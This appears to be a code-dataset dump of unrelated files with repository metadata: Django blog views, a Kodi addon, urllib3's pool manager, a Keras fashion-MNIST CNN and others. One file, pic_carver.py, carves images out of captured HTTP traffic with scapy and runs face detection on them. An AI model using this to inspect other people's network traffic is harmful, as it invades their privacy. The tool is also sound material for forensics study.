self.r.incr('visit:' + serializer_blog.data['url'] + ':totals')
if page is not None:
serializer_reply = ReplySerializer(page, context=self.get_serializer_context(), many=True)
return Response(
{"blog": serializer_blog.data, "replies": self.get_paginated_response(serializer_reply.data).data},
template_name='blog/detail.html')
serializer_reply = ReplySerializer(replies_queryset, context=self.get_serializer_context(), many=True)
return Response({"blog": serializer_blog.data, "replies": serializer_reply.data},
template_name='blog/detail.html')
# 重写create以过滤'blog_title'字段
def create(self, request, *args, **kwargs):
data = copy(request.data)
data['blog_title'] = data['blog_title'].replace("\n", "")
serializer = self.get_serializer(data=data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
self.r.set('visit:' + serializer.data['url'] + ':totals',0)
headers = self.get_success_headers(serializer.data)
#return 中的template_name没有实际意义。单元测试中需要给出返回的template。
return Response(serializer.data, status=302, headers=headers,template_name='blog/index.html',)
# 重写list以适应分页需求
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset()).order_by("-pub_date")
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
blogs = self.get_paginated_response(serializer.data).data
click = list()
for b in blogs['results']:
click.append(self.r.get('visit:' + b['url'] + ':totals').strip() if self.r.get('visit:' + b['url'] + ':totals') else 0)
return Response({'blog': blogs,
'click':click,
'user': request.user,
'form': RegisterForm},
template_name='blog/index.html')
serializer = self.get_serializer(queryset, many=True)
return Response({'blog': serializer,
'user': request.user,
'form': RegisterForm}, template_name='blog/index.html')
class ReplyViewSet(viewsets.ModelViewSet):
"""
This viewset provides `list`, `create`, `retrieve`, `update` and `destroy` actions.
"""
queryset = Reply.objects.all()
serializer_class = ReplySerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly)
renderer_classes = (renderers.TemplateHTMLRenderer, renderers.JSONRenderer)
template_name = "blog/reply_in_reply.html"
def perform_create(self, serializer):
serializer.save(user=self.request.user)
# 重写retrieve以适应分页需求
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer = self.get_serializer(instance)
queryset = ReplyInReply.objects.filter(reply=instance)
page = self.paginate_queryset(queryset)
if page is not None:
reply_serializer = ReplyInReplySerializer(page, context=self.get_serializer_context(), many=True)
data = {
"reply": serializer.data,
"replies_in_reply": self.get_paginated_response(reply_serializer.data).data
}
return Response(data, template_name=self.template_name)
reply_serializer = ReplyInReplySerializer(queryset, context=self.get_serializer_context(), many=True)
data = {"reply": serializer.data, "replies_in_reply": reply_serializer.data}
return Response(data, template_name=self.template_name)
class ReplyInReplyViewSet(viewsets.ModelViewSet):
"""
This viewset provides `list`, `create`, `retrieve`, `update` and `destroy` actions.
"""
queryset = ReplyInReply.objects.all()
serializer_class = ReplyInReplySerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly)
def perform_create(self, serializer):
serializer.save(user=self.request.user)
def get_queryset(self):
"""
Optionally restricts the returned purchases to a given user,
by filtering against a `username` query parameter in the URL.
"""
queryset = ReplyInReply.objects.all()
reply = self.request.GET.get('reply', None)
if reply is not None:
queryset = queryset.filter(reply=reply)
return queryset
@api_view(['GET'])
def api_root(request, format=None):
return Response({
'blogs': reverse('blog-list', request=request, format=format)
})
|
[
"279736390@qq.com"
] |
279736390@qq.com
|
b4763a14a248b1f0f0efcbc15e54c47c6fc13e15
|
ea18968292a59056bc61b3244cefe72ffef78cd3
|
/mysockets/pic_carver.py
|
e7c4ee910da34a33bd9052c0addbc21a710daac9
|
[] |
no_license
|
mladenangel/netlib
|
005d472321aeb60de763c2340772118c80bec279
|
15cf2233c9afb59273b04318400507fc6c26799b
|
refs/heads/master
| 2021-07-02T17:55:00.877326
| 2017-09-22T09:16:43
| 2017-09-22T09:16:43
| 103,915,556
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,976
|
py
|
# delwin
import re
import zlib
import cv2
from scapy.all import *
pictures_directory = "pic_carver/pictures"
faces_directory = "pic_carver/faces"
pcap_file = "bhp.pcap"
def face_detect(path,file_name):
img = cv2.imread(path)
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))
if len(rects) == 0:
return False
rects[:, 2:] += rects[:, :2]
# highlight the faces in the image
for x1,y1,x2,y2 in rects:
cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)
cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)
return True
def get_http_headers(http_payload):
try:
# split the headers off if it is HTTP traffic
headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
# break out the headers
headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
except:
return None
if "Content-Type" not in headers:
return None
return headers
def extract_image(headers,http_payload):
image = None
image_type = None
try:
if "image" in headers['Content-Type']:
# grab the image type and image body
image_type = headers['Content-Type'].split("/")[1]
image = http_payload[http_payload.index("\r\n\r\n")+4:]
# if we detect compression decompress the image
try:
if "Content-Encoding" in headers.keys():
if headers['Content-Encoding'] == "gzip":
image = zlib.decompress(image,16+zlib.MAX_WBITS)
elif headers['Content-Encoding'] == "deflate":
image = zlib.decompress(image)
except:
pass
except:
return None,None
return image,image_type
def http_assembler(pcap_file):
carved_images = 0
faces_detected = 0
a = rdpcap(pcap_file)
sessions = a.sessions()
for session in sessions:
http_payload = ""
for packet in sessions[session]:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
# reassemble the stream into a single buffer
http_payload += str(packet[TCP].payload)
except:
pass
headers = get_http_headers(http_payload)
if headers is None:
continue
image,image_type = extract_image(headers,http_payload)
if image is not None and image_type is not None:
# store the image
file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
fd = open("%s/%s" % (pictures_directory,file_name),"wb")
fd.write(image)
fd.close()
carved_images += 1
# now attempt face detection
try:
result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)
if result is True:
faces_detected += 1
except:
pass
return carved_images, faces_detected
carved_images, faces_detected = http_assembler(pcap_file)
print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected
|
[
"noreply@github.com"
] |
mladenangel.noreply@github.com
|
e9b7132d6589ec6b9e50e266625178a1d3ac89c7
|
aff5561456692039166942f3bdeb5b0f04836e87
|
/OuterLayers/AdapterLayer/RESTAPI/Endpoints/Comment/GETAnswerComments.py
|
ac0c9d8213264f14bd43a6da84e03e7ccdd8cf3f
|
[] |
no_license
|
BinMunawir/MiniOverflow
|
5d12c5fd22764ebcf01930686f5a8d7e6ff909e3
|
a8172de7cc443d738f734a2325d990fe7c396030
|
refs/heads/main
| 2023-02-22T20:03:08.218448
| 2021-01-28T04:02:27
| 2021-01-28T04:02:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
import json
from InnerLayers.DomainLayer.DomainSpecificLanguage.UUID import UUID
from InnerLayers.UsecaseLayer.ApplicationUsecases.CommentUsecases import getAnswerComments
from InnerLayers.UsecaseLayer.DataTrnsferObjects.CommentDTO import CommentDTO
from InnerLayers.UsecaseLayer.DataTrnsferObjects.AnswerDTO import AnswerDTO
from OuterLayers.AdapterLayer.RESTAPI.Endpoint import Endpoint
from OuterLayers.AdapterLayer.RESTAPI.Endpoints.Exception import HttpException
from OuterLayers.AdapterLayer.RESTAPI.HttpRequest import HttpRequest
from OuterLayers.AdapterLayer.RESTAPI.HttpResponse import HttpResponse
class GETAnswerComments(Endpoint):
method = "GET"
path = "/api/questions/:questionID/answers/:answerID/comments"
def __init__(self, request: HttpRequest):
super(GETAnswerComments, self).__init__(request)
def handle(self) -> HttpResponse:
try:
answerID = self.request.pathParams['answerID']
except Exception as e:
raise HttpException(1111, 'answerID are required')
comments = getAnswerComments(UUID(answerID))
commentsMap = CommentDTO.toListOfMap(comments)
response: HttpResponse = HttpResponse(200, {'Content-Type': 'application/json'}, json.dumps(commentsMap))
return response
|
[
"abdullahbinmunawer@gmail.com"
] |
abdullahbinmunawer@gmail.com
|
d31fee29f41d7a84bcc9e0f2bc6953fa075e0fdb
|
7cfd109b11467a808a8481b8099f1906c646cf80
|
/blynkpay/asgi.py
|
e8d8f02b1756f3d1c9ae159513724233dc2d8117
|
[] |
no_license
|
UltraCreation-IT-Solution/BlinkPay
|
c3b6c1de95cc9f9bd099f5e65ab003be20cef38a
|
8e8cb4eae0a416736215fa237ae7e47fa50cf207
|
refs/heads/main
| 2023-08-19T08:37:51.961088
| 2021-09-29T05:49:50
| 2021-09-29T05:49:50
| 394,994,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
ASGI config for blynkpay project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'blynkpay.settings')
application = get_asgi_application()
|
[
"rishabh2023@gmail.com"
] |
rishabh2023@gmail.com
|
ea07e60204dcadc0b5fd7d6305d91563532fd57a
|
2a9a136296e3d2abebf3a3dbfbbb091076e9f15f
|
/env/Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
dd5e68c338aa17148c657138f88181a224ea1079
|
[] |
no_license
|
Lisukod/planet-tracker
|
a865e3920b858000f5d3de3b11f49c3d158e0e97
|
6714e6332b1dbccf7a3d44430620f308c9560eaa
|
refs/heads/master
| 2023-02-18T19:26:16.705182
| 2021-01-23T01:51:58
| 2021-01-23T01:51:58
| 328,032,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,048
|
py
|
from __future__ import absolute_import
import collections
import functools
import logging
from ._collections import RecentlyUsedContainer
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
port_by_scheme,
)
from .exceptions import (
LocationValueError,
MaxRetryError,
ProxySchemeUnknown,
ProxySchemeUnsupported,
URLSchemeUnknown,
)
from .packages import six
from .packages.six.moves.urllib.parse import urljoin
from .request import RequestMethods
from .util.proxy import connection_requires_http_tunnel
from .util.retry import Retry
from .util.url import parse_url
__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]
log = logging.getLogger(__name__)
SSL_KEYWORDS = (
"key_file",
"cert_file",
"cert_reqs",
"ca_certs",
"ssl_version",
"ca_cert_dir",
"ssl_context",
"key_password",
)
# All known keyword arguments that could be provided to the pool manager, its
# pools, or the underlying connections. This is used to construct a pool key.
_key_fields = (
"key_scheme", # str
"key_host", # str
"key_port", # int
"key_timeout", # int or float or Timeout
"key_retries", # int or Retry
"key_strict", # bool
"key_block", # bool
"key_source_address", # str
"key_key_file", # str
"key_key_password", # str
"key_cert_file", # str
"key_cert_reqs", # str
"key_ca_certs", # str
"key_ssl_version", # str
"key_ca_cert_dir", # str
"key_ssl_context", # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext
"key_maxsize", # int
"key_headers", # dict
"key__proxy", # parsed proxy url
"key__proxy_headers", # dict
"key__proxy_config", # class
"key_socket_options", # list of (level (int), optname (int), value (int or str)) tuples
"key__socks_options", # dict
"key_assert_hostname", # bool or string
"key_assert_fingerprint", # str
"key_server_hostname", # str
)
#: The namedtuple class used to construct keys for the connection pool.
#: All custom key schemes should include the fields in this key at a minimum.
PoolKey = collections.namedtuple("PoolKey", _key_fields)
_proxy_config_fields = ("ssl_context", "use_forwarding_for_https")
ProxyConfig = collections.namedtuple("ProxyConfig", _proxy_config_fields)
def _default_key_normalizer(key_class, request_context):
"""
Create a pool key out of a request context dictionary.
According to RFC 3986, both the scheme and host are case-insensitive.
Therefore, this function normalizes both before constructing the pool
key for an HTTPS request. If you wish to change this behaviour, provide
alternate callables to ``key_fn_by_scheme``.
:param key_class:
The class to use when constructing the key. This should be a namedtuple
with the ``scheme`` and ``host`` keys at a minimum.
:type key_class: namedtuple
:param request_context:
A dictionary-like object that contain the context for a request.
:type request_context: dict
:return: A namedtuple that can be used as a connection pool key.
:rtype: PoolKey
"""
# Since we mutate the dictionary, make a copy first
context = request_context.copy()
context["scheme"] = context["scheme"].lower()
context["host"] = context["host"].lower()
# These are both dictionaries and need to be transformed into frozensets
for key in ("headers", "_proxy_headers", "_socks_options"):
if key in context and context[key] is not None:
context[key] = frozenset(context[key].items())
# The socket_options key may be a list and needs to be transformed into a
# tuple.
socket_opts = context.get("socket_options")
if socket_opts is not None:
context["socket_options"] = tuple(socket_opts)
# Map the kwargs to the names in the namedtuple - this is necessary since
# namedtuples can't have fields starting with '_'.
for key in list(context.keys()):
context["key_" + key] = context.pop(key)
# Default to ``None`` for keys missing from the context
for field in key_class._fields:
if field not in context:
context[field] = None
return key_class(**context)
#: A dictionary that maps a scheme to a callable that creates a pool key.
#: This can be used to alter the way pool keys are constructed, if desired.
#: Each PoolManager makes a copy of this dictionary so they can be configured
#: globally here, or individually on the instance.
key_fn_by_scheme = {
"http": functools.partial(_default_key_normalizer, PoolKey),
"https": functools.partial(_default_key_normalizer, PoolKey),
}
pool_classes_by_scheme = {
"http": HTTPConnectionPool,
"https": HTTPSConnectionPool,
}
class PoolManager(RequestMethods):
"""
Allows for arbitrary requests while transparently keeping track of
necessary connection pools for you.
:param num_pools:
Number of connection pools to cache before discarding the least
recently used pool.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param \\**connection_pool_kw:
Additional parameters are used to create fresh
:class:`urllib3.connectionpool.ConnectionPool` instances.
Example::
>>> manager = PoolManager(num_pools=2)
>>> r = manager.request('GET', 'http://google.com/')
>>> r = manager.request('GET', 'http://google.com/mail')
>>> r = manager.request('GET', 'http://yahoo.com/')
>>> len(manager.pools)
2
"""
proxy = None
proxy_config = None
def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
RequestMethods.__init__(self, headers)
self.connection_pool_kw = connection_pool_kw
self.pools = RecentlyUsedContainer(
num_pools, dispose_func=lambda p: p.close()
)
# Locally set the pool classes and keys so other PoolManagers can
# override them.
self.pool_classes_by_scheme = pool_classes_by_scheme
self.key_fn_by_scheme = key_fn_by_scheme.copy()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.clear()
# Return False to re-raise any potential exceptions
return False
def _new_pool(self, scheme, host, port, request_context=None):
"""
Create a new :class:`urllib3.connectionpool.ConnectionPool` based on host, port, scheme, and
any additional pool keyword arguments.
If ``request_context`` is provided, it is provided as keyword arguments
to the pool class used. This method is used to actually create the
connection pools handed out by :meth:`connection_from_url` and
companion methods. It is intended to be overridden for customization.
"""
pool_cls = self.pool_classes_by_scheme[scheme]
if request_context is None:
request_context = self.connection_pool_kw.copy()
# Although the context has everything necessary to create the pool,
# this function has historically only used the scheme, host, and port
# in the positional args. When an API change is acceptable these can
# be removed.
for key in ("scheme", "host", "port"):
request_context.pop(key, None)
if scheme == "http":
for kw in SSL_KEYWORDS:
request_context.pop(kw, None)
return pool_cls(host, port, **request_context)
def clear(self):
"""
Empty our store of pools and direct them all to close.
This will not affect in-flight connections, but they will not be
re-used after completion.
"""
self.pools.clear()
def connection_from_host(
self, host, port=None, scheme="http", pool_kwargs=None
):
"""
Get a :class:`urllib3.connectionpool.ConnectionPool` based on the host, port, and scheme.
If ``port`` isn't given, it will be derived from the ``scheme`` using
``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is
provided, it is merged with the instance's ``connection_pool_kw``
variable and used to create the new connection pool, if one is
needed.
"""
if not host:
raise LocationValueError("No host specified.")
request_context = self._merge_pool_kwargs(pool_kwargs)
request_context["scheme"] = scheme or "http"
if not port:
port = port_by_scheme.get(request_context["scheme"].lower(), 80)
request_context["port"] = port
request_context["host"] = host
return self.connection_from_context(request_context)
def connection_from_context(self, request_context):
"""
Get a :class:`urllib3.connectionpool.ConnectionPool` based on the request context.
``request_context`` must at least contain the ``scheme`` key and its
value must be a key in ``key_fn_by_scheme`` instance variable.
"""
scheme = request_context["scheme"].lower()
pool_key_constructor = self.key_fn_by_scheme.get(scheme)
if not pool_key_constructor:
raise URLSchemeUnknown(scheme)
pool_key = pool_key_constructor(request_context)
return self.connection_from_pool_key(
pool_key, request_context=request_context
)
def connection_from_pool_key(self, pool_key, request_context=None):
"""
Get a :class:`urllib3.connectionpool.ConnectionPool` based on the provided pool key.
``pool_key`` should be a namedtuple that only contains immutable
objects. At a minimum it must have the ``scheme``, ``host``, and
``port`` fields.
"""
with self.pools.lock:
# If the scheme, host, or port doesn't match existing open
# connections, open a new ConnectionPool.
pool = self.pools.get(pool_key)
if pool:
return pool
# Make a fresh ConnectionPool of the desired type
scheme = request_context["scheme"]
host = request_context["host"]
port = request_context["port"]
pool = self._new_pool(
scheme, host, port, request_context=request_context
)
self.pools[pool_key] = pool
return pool
def connection_from_url(self, url, pool_kwargs=None):
"""
Similar to :func:`urllib3.connectionpool.connection_from_url`.
If ``pool_kwargs`` is not provided and a new pool needs to be
constructed, ``self.connection_pool_kw`` is used to initialize
the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
is provided, it is used instead. Note that if a new pool does not
need to be created for the request, the provided ``pool_kwargs`` are
not used.
"""
u = parse_url(url)
return self.connection_from_host(
u.host, port=u.port, scheme=u.scheme, pool_kwargs=pool_kwargs
)
def _merge_pool_kwargs(self, override):
"""
Merge a dictionary of override values for self.connection_pool_kw.
This does not modify self.connection_pool_kw and returns a new dict.
Any keys in the override dictionary with a value of ``None`` are
removed from the merged dictionary.
"""
base_pool_kwargs = self.connection_pool_kw.copy()
if override:
for key, value in override.items():
if value is None:
try:
del base_pool_kwargs[key]
except KeyError:
pass
else:
base_pool_kwargs[key] = value
return base_pool_kwargs
def _proxy_requires_url_absolute_form(self, parsed_url):
"""
Indicates if the proxy requires the complete destination URL in the
request. Normally this is only needed when not using an HTTP CONNECT
tunnel.
"""
if self.proxy is None:
return False
return not connection_requires_http_tunnel(
self.proxy, self.proxy_config, parsed_url.scheme
)
def _validate_proxy_scheme_url_selection(self, url_scheme):
"""
Validates that were not attempting to do TLS in TLS connections on
Python2 or with unsupported SSL implementations.
"""
if self.proxy is None or url_scheme != "https":
return
if self.proxy.scheme != "https":
return
if six.PY2 and not self.proxy_config.use_forwarding_for_https:
raise ProxySchemeUnsupported(
"Contacting HTTPS destinations through HTTPS proxies "
"'via CONNECT tunnels' is not supported in Python 2"
)
def urlopen(self, method, url, redirect=True, **kw):
"""
Same as :meth:`urllib3.HTTPConnectionPool.urlopen`
with custom cross-host redirect logic and only sends the request-uri
portion of the ``url``.
The given ``url`` parameter must be absolute, such that an appropriate
:class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
"""
u = parse_url(url)
self._validate_proxy_scheme_url_selection(u.scheme)
conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)
kw["assert_same_host"] = False
kw["redirect"] = False
if "headers" not in kw:
kw["headers"] = self.headers.copy()
if self._proxy_requires_url_absolute_form(u):
response = conn.urlopen(method, url, **kw)
else:
response = conn.urlopen(method, u.request_uri, **kw)
redirect_location = redirect and response.get_redirect_location()
if not redirect_location:
return response
# Support relative URLs for redirecting.
redirect_location = urljoin(url, redirect_location)
# RFC 7231, Section 6.4.4
if response.status == 303:
method = "GET"
retries = kw.get("retries")
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect)
# Strip headers marked as unsafe to forward to the redirected location.
# Check remove_headers_on_redirect to avoid a potential network call within
# conn.is_same_host() which may use socket.gethostbyname() in the future.
if retries.remove_headers_on_redirect and not conn.is_same_host(
redirect_location
):
headers = list(six.iterkeys(kw["headers"]))
for header in headers:
if header.lower() in retries.remove_headers_on_redirect:
kw["headers"].pop(header, None)
try:
retries = retries.increment(
method, url, response=response, _pool=conn
)
except MaxRetryError:
if retries.raise_on_redirect:
response.drain_conn()
raise
return response
kw["retries"] = retries
kw["redirect"] = redirect
log.info("Redirecting %s -> %s", url, redirect_location)
response.drain_conn()
return self.urlopen(method, redirect_location, **kw)
class ProxyManager(PoolManager):
"""
Behaves just like :class:`PoolManager`, but sends all requests through
the defined proxy, using the CONNECT method for HTTPS URLs.
:param proxy_url:
The URL of the proxy to be used.
:param proxy_headers:
A dictionary containing headers that will be sent to the proxy. In case
of HTTP they are being sent with each request, while in the
HTTPS/CONNECT case they are sent only once. Could be used for proxy
authentication.
:param proxy_ssl_context:
The proxy SSL context is used to establish the TLS connection to the
proxy when using HTTPS proxies.
:param use_forwarding_for_https:
(Defaults to False) If set to True will forward requests to the HTTPS
proxy to be made on behalf of the client instead of creating a TLS
tunnel via the CONNECT method. **Enabling this flag means that request
and response headers and content will be visible from the HTTPS proxy**
whereas tunneling keeps request and response headers and content
private. IP address, target hostname, SNI, and port are always visible
to an HTTPS proxy even when this flag is disabled.
Example:
>>> proxy = urllib3.ProxyManager('http://localhost:3128/')
>>> r1 = proxy.request('GET', 'http://google.com/')
>>> r2 = proxy.request('GET', 'http://httpbin.org/')
>>> len(proxy.pools)
1
>>> r3 = proxy.request('GET', 'https://httpbin.org/')
>>> r4 = proxy.request('GET', 'https://twitter.com/')
>>> len(proxy.pools)
3
"""
def __init__(
self,
proxy_url,
num_pools=10,
headers=None,
proxy_headers=None,
proxy_ssl_context=None,
use_forwarding_for_https=False,
**connection_pool_kw
):
if isinstance(proxy_url, HTTPConnectionPool):
proxy_url = "%s://%s:%i" % (
proxy_url.scheme,
proxy_url.host,
proxy_url.port,
)
proxy = parse_url(proxy_url)
if proxy.scheme not in ("http", "https"):
raise ProxySchemeUnknown(proxy.scheme)
if not proxy.port:
port = port_by_scheme.get(proxy.scheme, 80)
proxy = proxy._replace(port=port)
self.proxy = proxy
self.proxy_headers = proxy_headers or {}
self.proxy_ssl_context = proxy_ssl_context
self.proxy_config = ProxyConfig(
proxy_ssl_context, use_forwarding_for_https
)
connection_pool_kw["_proxy"] = self.proxy
connection_pool_kw["_proxy_headers"] = self.proxy_headers
connection_pool_kw["_proxy_config"] = self.proxy_config
super(ProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw
)
def connection_from_host(
self, host, port=None, scheme="http", pool_kwargs=None
):
if scheme == "https":
return super(ProxyManager, self).connection_from_host(
host, port, scheme, pool_kwargs=pool_kwargs
)
return super(ProxyManager, self).connection_from_host(
self.proxy.host,
self.proxy.port,
self.proxy.scheme,
pool_kwargs=pool_kwargs,
)
def _set_proxy_headers(self, url, headers=None):
"""
Sets headers needed by proxies: specifically, the Accept and Host
headers. Only sets headers not provided by the user.
"""
headers_ = {"Accept": "*/*"}
netloc = parse_url(url).netloc
if netloc:
headers_["Host"] = netloc
if headers:
headers_.update(headers)
return headers_
def urlopen(self, method, url, redirect=True, **kw):
"Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute."
u = parse_url(url)
if not connection_requires_http_tunnel(
self.proxy, self.proxy_config, u.scheme
):
# For connections using HTTP CONNECT, httplib sets the necessary
# headers on the CONNECT to the proxy. If we're not using CONNECT,
# we'll definitely need to set 'Host' at the very least.
headers = kw.get("headers", self.headers)
kw["headers"] = self._set_proxy_headers(url, headers)
return super(ProxyManager, self).urlopen(
method, url, redirect=redirect, **kw
)
def proxy_from_url(url, **kw):
return ProxyManager(proxy_url=url, **kw)
|
[
"45397160+Lisukod@users.noreply.github.com"
] |
45397160+Lisukod@users.noreply.github.com
|
4f54723b6c3b4d448d98b1dff2bb07f6d39ab0a2
|
6248492eb77639ab5c8108acb0ebe55ca2851d61
|
/resources/addon.py
|
df0d5b0f471f7bd9ba61ae93cba6d1ce591d4a73
|
[
"MIT"
] |
permissive
|
jyardin/plugin.video.orange.fr
|
1f2287d3cf39fafaf4be1c4a57bcc6c64143eec0
|
8fe878072d7315db4d8cf4e7dbad468ba85205a3
|
refs/heads/master
| 2023-03-28T09:24:52.324166
| 2021-03-23T18:38:30
| 2021-03-23T18:38:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,081
|
py
|
# -*- coding: utf-8 -*-
"""Addon entry point"""
import routing # pylint: disable=import-error
import inputstreamhelper # pylint: disable=import-error
import xbmcgui
import xbmcplugin
from lib.iptvmanager import IPTVManager
from lib.providers import get_provider
from lib.utils import localize, log, LogLevel, ok_dialog
plugin = routing.Plugin()
@plugin.route('/')
def index():
"""Addon index"""
ok_dialog(localize(30902))
@plugin.route('/channel/<channel_id>')
def channel(channel_id: str):
"""Load stream for the required channel id"""
log('Loading channel {}'.format(channel_id), LogLevel.INFO)
stream = get_provider().get_stream_info(channel_id)
if not stream:
ok_dialog(localize(30900))
return
is_helper = inputstreamhelper.Helper(stream['manifest_type'], drm=stream['drm'])
if not is_helper.check_inputstream():
ok_dialog(localize(30901))
return
listitem = xbmcgui.ListItem(path=stream['path'])
listitem.setMimeType(stream['mime_type'])
listitem.setProperty('inputstream', 'inputstream.adaptive')
listitem.setProperty('inputstream.adaptive.manifest_type', stream['manifest_type'])
listitem.setProperty('inputstream.adaptive.manifest_update_parameter', 'full')
listitem.setProperty('inputstream.adaptive.license_type', stream['license_type'])
listitem.setProperty('inputstream.adaptive.license_key', stream['license_key'])
xbmcplugin.setResolvedUrl(plugin.handle, True, listitem=listitem)
@plugin.route('/iptv/channels')
def iptv_channels():
"""Return JSON-STREAMS formatted data for all live channels"""
log('Loading channels for IPTV Manager', LogLevel.INFO)
port = int(plugin.args.get('port')[0])
IPTVManager(port, get_provider()).send_channels()
@plugin.route('/iptv/epg')
def iptv_epg():
"""Return JSON-EPG formatted data for all live channel EPG data"""
log('Loading EPG for IPTV Manager', LogLevel.INFO)
port = int(plugin.args.get('port')[0])
IPTVManager(port, get_provider()).send_epg()
if __name__ == '__main__':
plugin.run()
|
[
"breizhreloaded@outlook.com"
] |
breizhreloaded@outlook.com
|
fa567b2bc1cfa7502e7544246dc56e6770291827
|
4a23e92fe85b99b3a0ea3c071e8a5280bc72cc45
|
/Solutions/Python/These are not my grades! (Revamped !)(7 kyu).py
|
fb59d5c06d1db01e857f82a5b968a5157ece3956
|
[
"MIT"
] |
permissive
|
collenirwin/Codewars-Solutions
|
88c406444a74a6b730e8bfc2eee13025d34c2260
|
14bad3878d3fc37c7e73cbaaaa24cd28f759ce3b
|
refs/heads/master
| 2020-04-05T01:27:56.790811
| 2018-11-06T19:52:32
| 2018-11-06T19:52:32
| 156,437,582
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
class Student:
def __init__(self, first_name, last_name, grades = None):
self.first_name = first_name
self.last_name = last_name
self.grades = grades if grades != None else []
def add_grade(self, grade):
self.grades.append(grade)
def get_average(self):
return sum(self.grades) / len(self.grades)
|
[
"Collen.Irwin@clinton.edu"
] |
Collen.Irwin@clinton.edu
|
b74dedcc178bc0603b253a6a13b6ac10e05a946d
|
104c75a214acd963773641b8a5f78a7450d627fe
|
/vgg19hcnn.py
|
f295161dd60650a5398aa5cae9d72a6778cd35b9
|
[
"MIT"
] |
permissive
|
ailabnjtech/B-CNN
|
5fd9f9a6b0cc0d77be4a603c191ea4ed654b54a8
|
40b78f0fe81120248832609f897be5d04e8d8431
|
refs/heads/main
| 2023-01-04T05:56:22.893912
| 2020-10-14T11:35:33
| 2020-10-14T11:35:33
| 303,994,387
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,497
|
py
|
# -*- coding: utf-8 -*-
"""VGG19HCNN.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/github/AdicherlaVenkataSai/H-CNNforfashionImageclassification/blob/master/VGG19HCNN.ipynb
"""
import keras
import numpy as np
import pickle
import os
from keras.models import Model
from keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, MaxPooling2D, Input
from keras.initializers import he_normal
from keras import optimizers
from keras.callbacks import LearningRateScheduler, TensorBoard
from keras.layers.normalization import BatchNormalization
from keras.utils.data_utils import get_file
from keras.utils import to_categorical
from keras import backend as K
def scheduler(epoch):
learning_rate_init = 0.001
if epoch > 42:
learning_rate_init = 0.0002
if epoch > 52:
learning_rate_init = 0.00005
return learning_rate_init
def unpickle(filename):
file = os.path.join(data_dir, filename)
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
class LossWeightsModifier(keras.callbacks.Callback):
def __init__(self, alpha, beta, gamma):
self.alpha = alpha
self.beta = beta
self.gamma = gamma
# customize your behavior
def on_epoch_end(self, epoch, logs={}):
if epoch == 15:
K.set_value(self.alpha, 0.1)
K.set_value(self.beta, 0.8)
K.set_value(self.gamma, 0.1)
if epoch == 25:
K.set_value(self.alpha, 0.1)
K.set_value(self.beta, 0.2)
K.set_value(self.gamma, 0.7)
if epoch == 35:
K.set_value(self.alpha, 0)
K.set_value(self.beta, 0)
K.set_value(self.gamma, 1)
height, width = 28, 28
channel = 1
if K.image_data_format() == 'channels_first':
input_shape = (channel, height, width)
else:
input_shape = (height, width, channel)
train_size = 60000
test_size = 10000
coarse1_classes = 2
coarse2_classes = 6
num_classes = 10
batch_size = 128
epochs = 60
log_filepath = './tb_log_vgg19_hierarchy_dynamic/'
weights_store_filepath = './vgg19_weights_hierarchy_dynamic/'
retrain_id = '101'
model_name = 'weights_vgg16_fashionmnist'+retrain_id+'.h5'
model_path = os.path.join(weights_store_filepath, model_name)
WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels.h5'
weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH,
cache_subdir='models')
(train_images, train_labels), (test_images, test_labels) = keras.datasets.fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
